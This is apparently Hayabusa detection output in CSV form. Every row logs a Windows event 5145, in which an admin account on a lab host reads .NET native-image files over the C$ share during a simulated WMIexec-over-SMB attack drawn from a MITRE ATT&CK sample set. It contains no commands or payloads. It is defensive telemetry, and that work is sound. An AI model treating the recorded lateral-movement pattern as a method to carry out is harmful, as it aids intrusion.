2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\93aa8a60d293a05752aca14646afe6d2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\65b4d38e24dfdd935b19ba1de243c244 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.616 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\20e180f5a613fa6fc6d2734676e45df9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\c44a74a8e4b895c50ca0a52e97d6428a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\15e0783372e02bd437cab8ac76420124 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\f7a43000e540605d6e0e171da4c2f1d4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\d72f9f8f53d2cae7691f333739a06f37 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\dbe5b3f92de7a1dc3900640c1907d600 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\4c22f9b9fda7e935d191dafdc77d9b1f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\f16e228634f247a35562db6ee33649f3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d1e6b39e15536aaa5fb9b1cacf8b18aa : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\0a331cd9fc9df7d44e898baf51e9e09e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net\61ed18221f09c6ff1b6071ff5a269d08 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\4a545096f3372d1b7307ee8849058910 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5ba9e9e2d2253e30f3f28e12016e441d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\8e945b32dd6b4b00c900f6c01c0f3c62 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0f95ad97e3260801c998976fb3a0e0e1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\4febdd9160ebfd86d00365dbdaca9054 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#\32aee6654d81a07e698f9ee18c886a2a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\65e679add728957b62f4bbba59d88386 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3e17b0be5e7a03853d44d996d366e88b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\2abf386e286ec43711933fbe3e652014 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\6ef9bbadb5c7087da45798a762683eeb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#\ed68489987b413410ccb94c6e704f6b4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.772 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\183eaaded316165bfbd32a991e4e8c8a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security\ba6ea4732f569e0674d6a43a82de5cc2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\09e0258d6e4a9d467c32dc8ac58766f2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\c97638c574cae07911907fa19e2aeedd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.803 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.819 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\e9302436a2c607db888bcb3b14ebba8e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
